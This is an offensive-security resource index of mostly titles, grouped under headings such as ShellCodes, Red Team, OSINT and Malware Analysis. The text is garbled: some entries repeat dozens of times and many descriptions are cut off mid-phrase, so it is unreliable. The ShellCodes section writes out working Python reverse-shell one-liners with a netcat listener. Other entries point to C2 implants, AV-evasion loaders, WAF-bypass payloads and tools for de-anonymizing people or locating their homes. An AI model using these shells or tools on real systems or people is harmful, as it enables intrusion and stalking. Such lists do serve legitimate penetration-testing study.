- Shikata Ga Nai Encoder Still Going Strong
- Payload Delivery for DevOps - Platform Dropper Using the Genesis Framework, Metasploit and Docker. [code](https://github.com/gen0cide/gscript)
- Awesome one-liner bug bounty
- Payload Delivery for DevOps - Platform Dropper Using the Genesis Framework, Metasploit and Docker. [code](https://github.com/gen0cide/gscript)
- Awesome one-liner bug bounty
- Payload Delivery for DevOps - Platform Dropper Using the Genesis Framework, Metasploit and Docker. [code](https://github.com/gen0cide/gscript)
- Awesome one-liner bug bounty
- Dangerous Injections
- Payload Delivery for DevOps - Platform Dropper Using the Genesis Framework, Metasploit and Docker. [code](https://github.com/gen0cide/gscript)
- Awesome one-liner bug bounty
- Dangerous Injections
- OAuth 2.0 Hacking Simplified — Part 2 — Vulnerabilities and Mitigation
- Handling Short Expiration Time of Authorization Tokens
- Payload Delivery for DevOps - Platform Dropper Using the Genesis Framework, Metasploit and Docker. [code](https://github.com/gen0cide/gscript)
- Awesome one-liner bug bounty
- Dangerous Injections
- OAuth 2.0 Hacking Simplified — Part 2 — Vulnerabilities and Mitigation
- Handling Short Expiration Time of Authorization Tokens
- Payload Delivery for DevOps - Platform Dropper Using the Genesis Framework, Metasploit and Docker. [code](https://github.com/gen0cide/gscript)
- Awesome one-liner bug bounty
- Dangerous Injections
- Payload Delivery for DevOps - Platform Dropper Using the Genesis Framework, Metasploit and Docker. [code](https://github.com/gen0cide/gscript)
- Awesome one-liner bug bounty
- Dangerous Injections
- Payload Delivery for DevOps - Platform Dropper Using the Genesis Framework, Metasploit and Docker. [code](https://github.com/gen0cide/gscript)
- Awesome one-liner bug bounty
- Payload Delivery for DevOps - Platform Dropper Using the Genesis Framework, Metasploit and Docker. [code](https://github.com/gen0cide/gscript)
- Awesome one-liner bug bounty
- Dangerous Injections
- Payload Delivery for DevOps - Platform Dropper Using the Genesis Framework, Metasploit and Docker. [code](https://github.com/gen0cide/gscript)
- Awesome one-liner bug bounty
- Dangerous Injections
- OAuth 2.0 Hacking Simplified — Part 2 — Vulnerabilities and Mitigation
- Handling Short Expiration Time of Authorization Tokens
- Payload Delivery for DevOps - Platform Dropper Using the Genesis Framework, Metasploit and Docker. [code](https://github.com/gen0cide/gscript)
- Awesome one-liner bug bounty
- An investigation into SQL Injection tools — The pattern of each attack tool Part II
- Advanced SQL Injection
- Breaking Protocol (Buffers): Reverse Engineering gRPC Binaries
- Payload Delivery for DevOps - Platform Dropper Using the Genesis Framework, Metasploit and Docker. [code](https://github.com/gen0cide/gscript)
- Awesome one-liner bug bounty
- Dangerous Injections
- OAuth 2.0 Hacking Simplified — Part 2 — Vulnerabilities and Mitigation
- Handling Short Expiration Time of Authorization Tokens
- Payload Delivery for DevOps - Platform Dropper Using the Genesis Framework, Metasploit and Docker. [code](https://github.com/gen0cide/gscript)
- Awesome one-liner bug bounty
- Dangerous Injections
- OAuth 2.0 Hacking Simplified — Part 2 — Vulnerabilities and Mitigation
- Handling Short Expiration Time of Authorization Tokens
- Payload Delivery for DevOps - Platform Dropper Using the Genesis Framework, Metasploit and Docker. [code](https://github.com/gen0cide/gscript)
- Awesome one-liner bug bounty
- Dangerous Injections
- OAuth 2.0 Hacking Simplified — Part 2 — Vulnerabilities and Mitigation
- Handling Short Expiration Time of Authorization Tokens
- Payload Delivery for DevOps - Platform Dropper Using the Genesis Framework, Metasploit and Docker. [code](https://github.com/gen0cide/gscript)
- Awesome one-liner bug bounty
- Dangerous Injections
- OAuth 2.0 Hacking Simplified — Part 2 — Vulnerabilities and Mitigation
- Handling Short Expiration Time of Authorization Tokens
- Payload Delivery for DevOps - Platform Dropper Using the Genesis Framework, Metasploit and Docker. [code](https://github.com/gen0cide/gscript)
- Awesome one-liner bug bounty
- Dangerous Injections
- Payload Delivery for DevOps - Platform Dropper Using the Genesis Framework, Metasploit and Docker. [code](https://github.com/gen0cide/gscript)
- Awesome one-liner bug bounty
- Dangerous Injections
- Payload Delivery for DevOps - Platform Dropper Using the Genesis Framework, Metasploit and Docker. [code](https://github.com/gen0cide/gscript)
- Awesome one-liner bug bounty
- Payload Delivery for DevOps - Platform Dropper Using the Genesis Framework, Metasploit and Docker. [code](https://github.com/gen0cide/gscript)
- Awesome one-liner bug bounty
- Dangerous Injections
- OAuth 2.0 Hacking Simplified — Part 2 — Vulnerabilities and Mitigation
- Handling Short Expiration Time of Authorization Tokens
- Payload Delivery for DevOps - Platform Dropper Using the Genesis Framework, Metasploit and Docker. [code](https://github.com/gen0cide/gscript)
- Awesome one-liner bug bounty
- Payload Delivery for DevOps - Platform Dropper Using the Genesis Framework, Metasploit and Docker. [code](https://github.com/gen0cide/gscript)
- Awesome one-liner bug bounty
- Dangerous Injections
- OAuth 2.0 Hacking Simplified — Part 2 — Vulnerabilities and Mitigation
- Handling Short Expiration Time of Authorization Tokens
- MSFVenom - CheatSheet
- Payload Delivery for DevOps - Platform Dropper Using the Genesis Framework, Metasploit and Docker. [code](https://github.com/gen0cide/gscript)
- Awesome one-liner bug bounty
- Dangerous Injections
- Dumping a complete database using SQL injection
- OAuth 2.0 Hacking Simplified — Part 2 — Vulnerabilities and Mitigation
- Handling Short Expiration Time of Authorization Tokens
- Payload Delivery for DevOps - Platform Dropper Using the Genesis Framework, Metasploit and Docker. [code](https://github.com/gen0cide/gscript)
- Awesome one-liner bug bounty
- Dangerous Injections
- OAuth 2.0 Hacking Simplified — Part 2 — Vulnerabilities and Mitigation
- Handling Short Expiration Time of Authorization Tokens
- Payload Delivery for DevOps - Platform Dropper Using the Genesis Framework, Metasploit and Docker. [code](https://github.com/gen0cide/gscript)
- kadimus
- OAuth 2.0 Hacking Simplified — Part 2 — Vulnerabilities and Mitigation
- Payload Delivery for DevOps - Platform Dropper Using the Genesis Framework, Metasploit and Docker. [code](https://github.com/gen0cide/gscript)
- Awesome one-liner bug bounty
- Dangerous Injections
- Handling Short Expiration Time of Authorization Tokens
- Payload Delivery for DevOps - Platform Dropper Using the Genesis Framework, Metasploit and Docker. [code](https://github.com/gen0cide/gscript)
- Awesome one-liner bug bounty
- DNS Hijacking Attacks on Home Routers in Brazil
- OAuth 2.0 Hacking Simplified — Part 2 — Vulnerabilities and Mitigation
- Handling Short Expiration Time of Authorization Tokens
- Payload Delivery for DevOps - Platform Dropper Using the Genesis Framework, Metasploit and Docker. [code](https://github.com/gen0cide/gscript)
- Awesome one-liner bug bounty
- Debugging your GraphQL server was never this easy!
- OAuth 2.0 Hacking Simplified — Part 2 — Vulnerabilities and Mitigation
- Handling Short Expiration Time of Authorization Tokens
- OAuth 2.0 Hacking Simplified — Part 2 — Vulnerabilities and Mitigation
- Payload Delivery for DevOps - Platform Dropper Using the Genesis Framework, Metasploit and Docker. [code](https://github.com/gen0cide/gscript)
- Awesome one-liner bug bounty
- Handling Short Expiration Time of Authorization Tokens
- Payload Delivery for DevOps - Platform Dropper Using the Genesis Framework, Metasploit and Docker. [code](https://github.com/gen0cide/gscript)
- Awesome one-liner bug bounty
- Payload Delivery for DevOps - Platform Dropper Using the Genesis Framework, Metasploit and Docker. [code](https://github.com/gen0cide/gscript)
- Awesome one-liner bug bounty
- Payload Delivery for DevOps - Platform Dropper Using the Genesis Framework, Metasploit and Docker. [code](https://github.com/gen0cide/gscript)
- Awesome one-liner bug bounty
- Payload Delivery for DevOps - Platform Dropper Using the Genesis Framework, Metasploit and Docker. [code](https://github.com/gen0cide/gscript)
- Payload Delivery for DevOps - Platform Dropper Using the Genesis Framework, Metasploit and Docker. [code](https://github.com/gen0cide/gscript)
- Awesome one-liner bug bounty
-
Reconnaissance
- Automated Reconnaissance Pipeline
- PERFORMING DOMAIN RECONNAISSANCE USING POWERSHELL
- URLBrute
- degoogle - through links and other sketchiness.
- Investigator - recon tool.
- PERFORMING DOMAIN RECONNAISSANCE USING POWERSHELL
- URLBrute
- degoogle - through links and other sketchiness.
-
Enumeration
- linux-smart-enumeration
- Ethical Hacking Course: Enumeration Theory
- massh-enum
- Ethical Hacking Course: Enumeration Theory
- subscraper
- Social Mapper - A Social Media Enumeration & Correlation Tool. [github repo](https://github.com/SpiderLabs/social_mapper)
- social_mapper
- WPExploitation
- linpostexp
- Social Mapper - A Social Media Enumeration & Correlation Tool. [github repo](https://github.com/SpiderLabs/social_mapper)
- LEGION - Automatic Enumeration Tool
- discover - Custom bash scripts used to automate various penetration testing tasks including recon, scanning, parsing, and creating malicious payloads and listeners with Metasploit.
- WPExploitation
- CTFR - force, it just abuses of Certificate Transparency logs.
- grinder - end systems (Shodan, Censys)
- Admin-Scanner
- Virtual host scanner
- vhost-brute
- grab_beacon_config
- assetfinder
- hackerone_wordlist
- paths wordlists
- subdomains wordlists
- parameters wordlists
- How to Roll a Strong Password with 20-Sided Dice and Fandom-Inspired Wordlists
- Assetnote Wordlists
- Weakpass - based online generator to create a wordlist based on a set of words entered by the user. [Kraker](https://github.com/zzzteph/kraker) is a distributed password brute-force system that focused on easy use.
- Default IoT Username/password
- Elpscrk
- SuperEnum
- Domain Dossier
- X41 BeanStack
- Skanuvaty
- OS Fingerprinting using NTP
- assetfinder
- paths wordlists
- How to Roll a Strong Password with 20-Sided Dice and Fandom-Inspired Wordlists
- Assetnote Wordlists
- Weakpass - based online generator to create a wordlist based on a set of words entered by the user. [Kraker](https://github.com/zzzteph/kraker) is a distributed password brute-force system that focused on easy use.
- Default IoT Username/password
- X41 BeanStack
- OS Fingerprinting using NTP
-
WebShells
-
ShellCodes
- Why is My Perfectly Good Shellcode Not Working?
- shellcode2asmjs - Spray payloads
- C-S1lentProcess1njector
- pe_to_shellcode
- stager.dll - metasploit-shellcode-to-evade-windows-defender/)
- ThreadBoat
- Excel4-DCOM
- MaliciousMacroMSBuild
- Excel4-DCOM
- MaliciousMacroMSBuild
- Linux x86 Reverse Shell Shellcode
- mem-loader.asm - memory using an anonymous file descriptor (inspired by [x-c3ll](https://x-c3ll.github.io/posts/fileless-memfd_create/)
- Shellab
- ShellcodeWrapper
- Fully (auto) interactive TTY shells
- I saw a python reverse shell, thought it looked a little long (215 chars), so I came up with my own! (107/98 ch) - lnvp 1234 / python3 -c "# 107, single statement, non-blocking __import__("subprocess").Popen("sh",0,None,*[ __import__("socket").create_connection(("127.0.0.1",1234))]*3)" or "# 98, separators, blocking import subprocess as S,socket; S.run("sh",0,None,*[ socket.create_connection(("127.0.0.1",1234))]*3)"
- python-pty-shells - full PTY or nothing!
- Powershell HTTP/S Reverse Shell
- HTTP/S Asynchronous Reverse Shell
- powershell reverse shell one-liner
- Reverse Shell Cheat Sheet
- Reverse Shell Generator - shell-generator)
- How to Execute Shell Commands with Python
- Reverse Shell to fully interactive
- Single-Line Web Shell
- Simple-Backdoor-One-Liner.php
- reverse shell
- Spawning reverse shells
- Spawning interactive reverse shells with TTY
- Reverse Shell Cheat Sheet
- shellver
- Using tmux for automating interactive reverse shells
- USING A C# SHELLCODE RUNNER AND CONFUSEREX TO BYPASS UAC WHILE EVADING AV
- New XML technique! Encode any DTD/XML inside an internal entity, and fly under WAF radars!
- Usando a pwntools para Binary Exploitation
- vba-obfuscator - PoC of malware code obfuscation in Word macros
- ProcessInjection
- shellcoding using env variables
- From a C project, through assembly, to shellcode
- SnapLoader
- Linux x86 Reverse Shell Shellcode
- mem-loader.asm - memory using an anonymous file descriptor (inspired by [x-c3ll](https://x-c3ll.github.io/posts/fileless-memfd_create/)
- Fully (auto) interactive TTY shells
- powershell reverse shell one-liner
- Reverse Shell Cheat Sheet
- How to Execute Shell Commands with Python
- Reverse Shell to fully interactive
- Single-Line Web Shell
- Simple-Backdoor-One-Liner.php
- reverse shell
- Spawning interactive reverse shells with TTY
- Using tmux for automating interactive reverse shells
- USING A C# SHELLCODE RUNNER AND CONFUSEREX TO BYPASS UAC WHILE EVADING AV
- Usando a pwntools para Binary Exploitation
- CallObfuscator
- shellcoding using env variables
- From a C project, through assembly, to shellcode
- Writing and Compiling Shellcode in C
- Using ICMP to deliver shellcode
- Buffer Overflow Windows - EGGHUNTER cheatsheet
- metasploit, x86/alpha_mixed and Windows 7 are killing me
- Some lessons learned along the way to Buffer Overflow
- Windows 10 Exploit Development Setup - Vulnserver Walkthrough Part 1
- Resolving API addresses in memory
- Locating Kernel32 Base Address
- Writing and Compiling Shellcode in C
- Buffer Overflow Windows - EGGHUNTER cheatsheet
- metasploit, x86/alpha_mixed and Windows 7 are killing me
- Some lessons learned along the way to Buffer Overflow
- Windows 10 Exploit Development Setup - Vulnserver Walkthrough Part 1
- Resolving API addresses in memory
- Finding Kernel32 Base and Function Addresses in Shellcode
- Finding Kernel32 Base and Function Addresses in Shellcode
- Basics of Windows shellcode writing
- Basics of Windows shellcode writing
- Shellcodes database for study cases
- Using tmux for automating interactive reverse shells
- Return Oriented Programming (ROP) Attacks
- ROPgadget Tool
- ROP Gadget Prevalence and Survival under Compiler-based Binary Diversification Schemes
- one_gadget
- ROP Gadget Prevalence and Survival under Compiler-based Binary Diversification Schemes
- JOP ROCKET - oriented Programming Reversing Open Cyber Knowledge Expert Tool, or JOP ROCKET, is a tool designed to help facilitate JOP gadget discovery in an x86 Windows environment.
- A fun trick for running shellcode directly from bash
- Polyglot Assembly
- Shellcode Injection Techniques
- Simple Shellcode Tale! - Fault-ao-executar-o-shellcode-1341182f023846ec9ad4da5b1729f7aa)
- Linux x86 execve("/bin/sh") - 28 bytes
- Windows/x86 Dynamic Bind Shell / Null-Free Shellcode
- Core
- Polyglot Assembly
- Shellcode Injection Techniques
- Simple Shellcode Tale! - Fault-ao-executar-o-shellcode-1341182f023846ec9ad4da5b1729f7aa)
- Linux x86 execve("/bin/sh") - 28 bytes
- ShellCode Tester
- Windows/x86 Dynamic Bind Shell / Null-Free Shellcode
- Core
- Ninja UUID Shellcode Runner
- IPFuscator
- Shellcode Mutator - instruction sets (such as nops) to avoid signatures.
- Using tmux for automating interactive reverse shells
- Using tmux for automating interactive reverse shells
- USING A C# SHELLCODE RUNNER AND CONFUSEREX TO BYPASS UAC WHILE EVADING AV
- metasploit, x86/alpha_mixed and Windows 7 are killing me
- Resolving API addresses in memory
- Polyglot Assembly
- Using tmux for automating interactive reverse shells
- Using tmux for automating interactive reverse shells
- Using tmux for automating interactive reverse shells
- Using tmux for automating interactive reverse shells
- Using tmux for automating interactive reverse shells
- Using tmux for automating interactive reverse shells
- Using tmux for automating interactive reverse shells
- Using tmux for automating interactive reverse shells
- Ten process injection techniques: A technical survey of common and trending process injection techniques
- Using tmux for automating interactive reverse shells
- Using tmux for automating interactive reverse shells
- Using tmux for automating interactive reverse shells
- Using tmux for automating interactive reverse shells
- Using tmux for automating interactive reverse shells
- Using tmux for automating interactive reverse shells
- Using tmux for automating interactive reverse shells
- Using tmux for automating interactive reverse shells
- Return Oriented Programming (ROP) Attacks
- Using tmux for automating interactive reverse shells
- Using tmux for automating interactive reverse shells
- Using tmux for automating interactive reverse shells
- Using tmux for automating interactive reverse shells
- Using tmux for automating interactive reverse shells
- SnapLoader
- Using tmux for automating interactive reverse shells
-
Reporting
- TryHackMe. Breaking Into the Kenobi Machine.
- This is how you can deliver true value through your pentest reports
- Technical Report template
- TryHackMe. Breaking Into the Kenobi Machine.
- This is how you can deliver true value through your pentest reports
- report-ng - based reports with HP WebInspect / Burp Suite Pro input, own custom data and knowledge base.
- PandocPentestReport
- Technical Report template
- TryHackMe. Breaking Into the Kenobi Machine.
- PwnDoc
- This is how you can deliver true value through your pentest reports
- TryHackMe. Breaking Into the Kenobi Machine.
- This is how you can deliver true value through your pentest reports
- TryHackMe. Breaking Into the Kenobi Machine.
- This is how you can deliver true value through your pentest reports
- TryHackMe. Breaking Into the Kenobi Machine.
- This is how you can deliver true value through your pentest reports
- TryHackMe. Breaking Into the Kenobi Machine.
- This is how you can deliver true value through your pentest reports
- TryHackMe. Breaking Into the Kenobi Machine.
- This is how you can deliver true value through your pentest reports
- TryHackMe. Breaking Into the Kenobi Machine.
- This is how you can deliver true value through your pentest reports
- TryHackMe. Breaking Into the Kenobi Machine.
- This is how you can deliver true value through your pentest reports
- TryHackMe. Breaking Into the Kenobi Machine.
- This is how you can deliver true value through your pentest reports
- TryHackMe. Breaking Into the Kenobi Machine.
- This is how you can deliver true value through your pentest reports
- TryHackMe. Breaking Into the Kenobi Machine.
- This is how you can deliver true value through your pentest reports
- TryHackMe. Breaking Into the Kenobi Machine.
- This is how you can deliver true value through your pentest reports
- TryHackMe. Breaking Into the Kenobi Machine.
- This is how you can deliver true value through your pentest reports
- TryHackMe. Breaking Into the Kenobi Machine.
- This is how you can deliver true value through your pentest reports
- TryHackMe. Breaking Into the Kenobi Machine.
- This is how you can deliver true value through your pentest reports
- TryHackMe. Breaking Into the Kenobi Machine.
- This is how you can deliver true value through your pentest reports
- TryHackMe. Breaking Into the Kenobi Machine.
- This is how you can deliver true value through your pentest reports
- TryHackMe. Breaking Into the Kenobi Machine.
- This is how you can deliver true value through your pentest reports
- TryHackMe. Breaking Into the Kenobi Machine.
- This is how you can deliver true value through your pentest reports
- TryHackMe. Breaking Into the Kenobi Machine.
- This is how you can deliver true value through your pentest reports
- TryHackMe. Breaking Into the Kenobi Machine.
- This is how you can deliver true value through your pentest reports
- TryHackMe. Breaking Into the Kenobi Machine.
- This is how you can deliver true value through your pentest reports
- TryHackMe. Breaking Into the Kenobi Machine.
- This is how you can deliver true value through your pentest reports
- TryHackMe. Breaking Into the Kenobi Machine.
- This is how you can deliver true value through your pentest reports
- TryHackMe. Breaking Into the Kenobi Machine.
- This is how you can deliver true value through your pentest reports
-
OSINT - Open Source INTelligence
- Slides from my ShellCon Talk, OSINT for Pen Tests, given 10/19.
- OSINT tool for visualizing relationships between domains, IPs and email addresses.
- iKy
- OSint Tools
- the-endorser
- OSINT-y Goodness
- OSINT Resources for 2019
- Directory of Open Access Journals
- Identifying A Pro-Indonesian Propaganda Bot Network
- Breaking Mimblewimble’s Privacy Model
- snscrape
- OSint Tools
- OSINT Resources for 2019
- Directory of Open Access Journals
- Identifying A Pro-Indonesian Propaganda Bot Network
- Breaking Mimblewimble’s Privacy Model
- ꓘamerka GUI - ciech/Kamerka-GUI). ICS/IoT search: [ꓘamerka](https://woj-ciech.github.io/kamerka-demo/kamerka.html). [Kamerka OSINT tool shows your country's internet-connected critical infrastructure](https://www.zdnet.com/article/kamerka-osint-tool-shows-your-countrys-internet-connected-critical-infrastructure/)
- dmi-tcat - Twitter Capture and Analysis Toolset.
- KnockKnock
- From email to phone number, a new OSINT approach
- recox
- openSquat
- From email to phone number, a new OSINT approach
- sifter
- Kitsune
- Image "Cloaking" for Personal Privacy - usenix20.pdf)
- usufy
- osrf
- IntelMQ - suite solution for IT security teams (CERTs & CSIRTs, SOCs abuse departments, etc.) for collecting and processing security feeds using a message queuing protocol. Its main goal is to give to incident responders an easy way to collect & process threat intelligence thus improving the incident handling processes of CERTs.
- OSINT SAN Framework. - SAN Framework makes it possible to quickly find information and de-anonymize Internet users. The software is a framework that contains 30 functions for searching information or de-anonymizing users. With the help of my software, you can collect information about users on the Internet, anonymously and without special skills.
- Scrummage
- viper
- ⡷⠂𝚔𝚊𝚛𝚖𝚊 𝚟𝟸⠐⢾
- 3WiFi
- Stealth plane in flight
- ExportData - Twitter data export tool. Allows downloading historical tweets since 2006, exporting followers & followings and collects historical trends in 467 locations.
- DetectDee
- OSINT framework
- ODBParser
- pastego
- Instagram Scraper
- galer - in.
- How to bypass CloudFlare bot protection ?
- SpyScrap
- dorking
- Complete Google Dorks List in 2020 For Ethical Hacking and Penetration Testing
- The closer a username/email address resembles other username/email addresses associated w/ a target, the easier it is to find (or guess &/or 'bruteforce') other usernames/email addresses associated w/ that target.
- DorkGenius
- chatter
- ail-feeder-telegram
- MODIFYING TELEGRAM'S "PEOPLE NEARBY" FEATURE TO PINPOINT PEOPLE'S HOMES
- WhatsMyName
- Maltego Transforms for WhatsMyName
- shadowbanned - eu/shadowban-eu-frontend)
- IntelMQ - suite solution for IT security teams (CERTs & CSIRTs, SOCs abuse departments, etc.) for collecting and processing security feeds using a message queuing protocol. Its main goal is to give to incident responders an easy way to collect & process threat intelligence thus improving the incident handling processes of CERTs.
- OSINT SAN Framework. - SAN Framework makes it possible to quickly find information and de-anonymize Internet users. The software is a framework that contains 30 functions for searching information or de-anonymizing users. With the help of my software, you can collect information about users on the Internet, anonymously and without special skills.
- Stealth plane in flight
- DetectDee
- ODBParser
- How to bypass CloudFlare bot protection ?
- dorking
- Complete Google Dorks List in 2020 For Ethical Hacking and Penetration Testing
- DorkGenius
- MODIFYING TELEGRAM'S "PEOPLE NEARBY" FEATURE TO PINPOINT PEOPLE'S HOMES
- signald
- signald
- Telegram messenger CLI - cli` for Telegram IM.
- TelegramScraper - /disinformation and investigating shade goings on.
- OSINT-Discord-resources
- Breaking Mimblewimble’s Privacy Model
- OSINT – Passive Recon and Discovery of Assets
- OSINT – LinkedIn is Not Just for Jobs
- ꓘamerka GUI - ciech/Kamerka-GUI). ICS/IoT search: [ꓘamerka](https://woj-ciech.github.io/kamerka-demo/kamerka.html). [Kamerka OSINT tool shows your country's internet-connected critical infrastructure](https://www.zdnet.com/article/kamerka-osint-tool-shows-your-countrys-internet-connected-critical-infrastructure/)
-
Vulnerability
- Beating the OWASP Benchmark
- Striker
- SQL Vulnerability Scanner
- Decentralized Application Security Project
- Introduction to IDAPython for Vulnerability Hunting — Somerset Recon
- Beating the OWASP Benchmark
- Introduction to IDAPython for Vulnerability Hunting — Somerset Recon
- Beating the OWASP Benchmark
- CMSScan
- Meteor Blind NoSQL Injection
- Meteor Blind NoSQL Injection
- Testing docker CVE scanners. Part 2.5 — Exploiting CVE scanners - scanner-exploiting-pocs)
- New NAT/Firewall Bypass Attack Lets Hackers Access Any TCP/UDP Service
- HellRaiser
- Open-Source Vulnerability Intelligence Center - Vulnerability Intelligence Center / Exploits
- Vagrant GVM/Openvas
- How to Have a Cybersecurity Graph Database on Your PC
- On the Security Vulnerabilities of Text-to-SQL Models
- New NAT/Firewall Bypass Attack Lets Hackers Access Any TCP/UDP Service
- Open-Source Vulnerability Intelligence Center - Vulnerability Intelligence Center / Exploits
- Vagrant GVM/Openvas
- How to Have a Cybersecurity Graph Database on Your PC
- On the Security Vulnerabilities of Text-to-SQL Models
- Beating the OWASP Benchmark
- Beating the OWASP Benchmark
- Beating the OWASP Benchmark
- Beating the OWASP Benchmark
- Beating the OWASP Benchmark
- Beating the OWASP Benchmark
- Beating the OWASP Benchmark
- Beating the OWASP Benchmark
- Testing docker CVE scanners. Part 2.5 — Exploiting CVE scanners - scanner-exploiting-pocs)
- Beating the OWASP Benchmark
- Beating the OWASP Benchmark
- Beating the OWASP Benchmark
- Beating the OWASP Benchmark
- Beating the OWASP Benchmark
- Beating the OWASP Benchmark
- Beating the OWASP Benchmark
- Beating the OWASP Benchmark
- Beating the OWASP Benchmark
- Beating the OWASP Benchmark
- Beating the OWASP Benchmark
- Beating the OWASP Benchmark
- Beating the OWASP Benchmark
- Beating the OWASP Benchmark
- Beating the OWASP Benchmark
- Beating the OWASP Benchmark
- Beating the OWASP Benchmark
- Beating the OWASP Benchmark
- Beating the OWASP Benchmark
- Beating the OWASP Benchmark
- Security Bulletins that relate to Netflix Open Source
- Beating the OWASP Benchmark
- Beating the OWASP Benchmark
- Beating the OWASP Benchmark
- Beating the OWASP Benchmark
-
WAFs
- Web Application Penetration Testing Course URLs
- Web Application Penetration Testing Notes
- quarantyne
- Sitadel
- WAF through the eyes of hackers
- Some nice payloads to bypass XSS WAF
- Web Application Penetration Testing Notes
- WAF through the eyes of hackers
- bypassing moderning web application firewalls
- Bypassing Cloudflare WAF with the origin server IP address
- WAF-Hook
- Behindflare tool
- Wordpress technique
- A Scientific Notation Bug in MySQL left AWS WAF Clients Vulnerable to SQL Injection
- Some MySQL tricks to break some #WAFs out there.
- another one
- bypassing moderning web application firewalls
- Bypassing Cloudflare WAF with the origin server IP address
- WAF-Hook
- Behindflare tool
- Wordpress technique
- A Scientific Notation Bug in MySQL left AWS WAF Clients Vulnerable to SQL Injection
-
Red Team
- Machine Learning for Red Teams, Part 1
- Flying under the radar
- demiguise
- jenkins-shell
- How Do I Prepare to Join a Red Team?
- Red Team & Physical Entry Gear
- Gaining access on an external engagement through spear-phishing
- Phantom Tap (PhanTap)
- So You Want to Run a Red Team Operation
- Machine Learning for Red Teams, Part 1
- demiguise
- Gaining access on an external engagement through spear-phishing
- Phantom Tap (PhanTap)
- Alternative C2 for Red Teamers - JScript RAT
- tunning tip
- In-Memory-Only ELF Execution (Without tmpfs)
- A Red Teamer's guide to pivoting
- FIN6 Adversary Emulation
- RedFile
- Choose Your Own Red Team Adventure
- Red Team Tactics: Hiding Windows Services
- AQUARMOURY
- Prelude Operator
- 0xsp Mongoose Red for Windows
- Macrome
- wifipumpkin3
- redcanaryco/AtomicTestHarnesses: Public Repo for Atomic Test Harness
- pivoting cheat sheet
- Self-hosting Your Red Team Payloads - deployable file hosting service for red teamers, allowing to easily upload and share payloads over HTTP and WebDAV.
- Boomerang
- Mythic - platform, red teaming framework.
- Bypassing User-Mode Hooks and Direct Invocation of System Calls for Red Teams
- Red Teaming/Adversary Simulation Toolkit
- Red Team development and operations
- VECTR
- Mortar Loader
- RedTeam-Tools
- Cobalt Strike - strike-4-2-everything-but-the-kitchen-sink/)
- CrossC2 - platform payload
- Cobalt-Strike-CheatSheet
- Introducing - strike.github.io/community_kit/)
- Octopus - operation C2 server based on python and powershell [Cobalt Strike Community Kit](https://cobalt-strike.github.io/community_kit/)
- Building C2 Implants in C++: A Primer
- tc2
- ToRat
- Python Backdoor Talking to a C2 Through Ngrok
- Cobalt Strike Beacon Injected into werfault.exe
- In-Memory-Only ELF Execution (Without tmpfs)
- FIN6 Adversary Emulation
- RedFile
- Choose Your Own Red Team Adventure
- Red Team Tactics: Hiding Windows Services
- Prelude Operator
- Boomerang
- Bypassing User-Mode Hooks and Direct Invocation of System Calls for Red Teams
- Red Team development and operations
- VECTR
- Mortar Loader
- RedTeam-Tools
- Cobalt Strike - strike-4-2-everything-but-the-kitchen-sink/)
- Cobalt-Strike-CheatSheet
- Introducing - strike.github.io/community_kit/)
- Octopus - operation C2 server based on python and powershell [Cobalt Strike Community Kit](https://cobalt-strike.github.io/community_kit/)
- Building C2 Implants in C++: A Primer
- tc2
- ToRat
- pyMalleableC2
- THIRD STEP IN SETTING UP C2 ENVIRONMENT. USING SOCAT AS FRONT TO MERLIN. COMMAND AND CONTROL MY WAY.
- Detecting CONTI CobaltStrike Lateral Movement Techniques - Part 2
- melting-cobalt
- 面向iOS攻击的beacon生成
- PoshC2 - exploitation and lateral movement. [Native macOS Implants](https://labs.nettitude.com/blog/poshc2-introducing-native-macos-implants/)
- link
- THIRD STEP IN SETTING UP C2 ENVIRONMENT. USING SOCAT AS FRONT TO MERLIN. COMMAND AND CONTROL MY WAY.
- Detecting CONTI CobaltStrike Lateral Movement Techniques - Part 2
- 面向iOS攻击的beacon生成
- Gaining access on an external engagement through spear-phishing
- Bypassing User-Mode Hooks and Direct Invocation of System Calls for Red Teams
- Red Team development and operations
- Cobalt Strike - strike-4-2-everything-but-the-kitchen-sink/)
- Building C2 Implants in C++: A Primer
- Detecting CONTI CobaltStrike Lateral Movement Techniques - Part 2
- Machine Learning for Red Teams, Part 1
- Red Tip #415 - r domain.fqdn -U username” to change the password so you can use the account.
- Cobalt Strike: Using Known Private Keys To Decrypt Traffic – Part 1
- Prelude Operator
- The-Hacker-Playbook-3-Translation
- ToRat
-
Purple Team
-
-
Malware Analysis
-
Hashing
- Unprotect
- Awesome Malware Analysis
- course
- CS6038/CS5138 Malware Analysis, UC - Malware-Analysis)
- list
- IKARUS anti.virus and its 9 exploitable kernel vulnerabilities
- Digital Certificates Used by Malware
- Signed Malware – The Dataset
- Malware Sample Sources for Researchers
- Indicators: Champing at the Cyberbit
- binary ninja
- OSX/MaMi
- mal100.evad.spre.rans.spyw.troj.winEXE@34/9@31/10
- Chaos: a Stolen Backdoor Rising Again
- Cuckoo Sandbox
- EternalGlue part two: A rebuilt NotPetya gets its first execution outside of the lab
- Forgot About Default Accounts? No Worries, GoScanSSH Didn’t
- TESSERACT: Eliminating Experimental Bias in Malware Classification across Space and Time
- colental/byob: BYOB (Build Your Own Botnet)
- Source Code for Exobot Android Banking Trojan Leaked Online
- Ramnit’s Network of Proxy Servers
- A malware analysis kit for the novice
- When a malware is more complex than the paper.
- Gh0st
- What you need to know about “LoJax”—the new, stealthy malware from Fancy Bear
- PHP Malware Examination
- Analysis of Linux.Haikai
- Cylance vs. MBRKiller Wiper Malware
- Deep Analysis of TrickBot New Module pwgrab
- Mac malware combines EmPyre backdoor and XMRig miner
- The Full Guide Understanding Fileless Malware Infections
- 'Injection' Without Injection
- Analysis of Neutrino Bot Sample - 08-27): In this post I analyze a Neutrino Bot sample.
- Thunderstrike2 details
- Malboxes
- Triton is the world’s most murderous malware, and it’s spreading
- Cloak and Dagger — Mobile Malware Techniques Demystified
- Welcome to the Dark Side: Part 1
- Welcome to the Dark Side: Part 2-1
- Welcome to the Dark Side: Part 2-2
- Welcome to the Dark Side: Part 3
- Welcome to the Dark Side: Part 4
- Command and Control via TCP Handshake
- wdeQEksXgm
- emotet - malware-IoCs_09-18-19.html)
- Anti-VM Technique with MSAcpi_ThermalZoneTemperature
- AMSI as a Service - less malware visible to AV engines.
- CAPA - source tool to identify capabilities in executable files. [capa-rules](https://github.com/fireeye/capa-rules)
- Unprotect
- FRITZFROG - TO-PEER BOTNETS. [detection script](https://github.com/guardicore/labs_campaigns/tree/master/FritzFrog)
- malware analysis and machine learning
- GhostDNSbusters
- The Tetrade
- Is macOS under the biggest malware attack ever?
- Hybrid Analysis
- Part 1: The Black-Box Approach
- ember
- The Art Of Mac Malware: Analysis
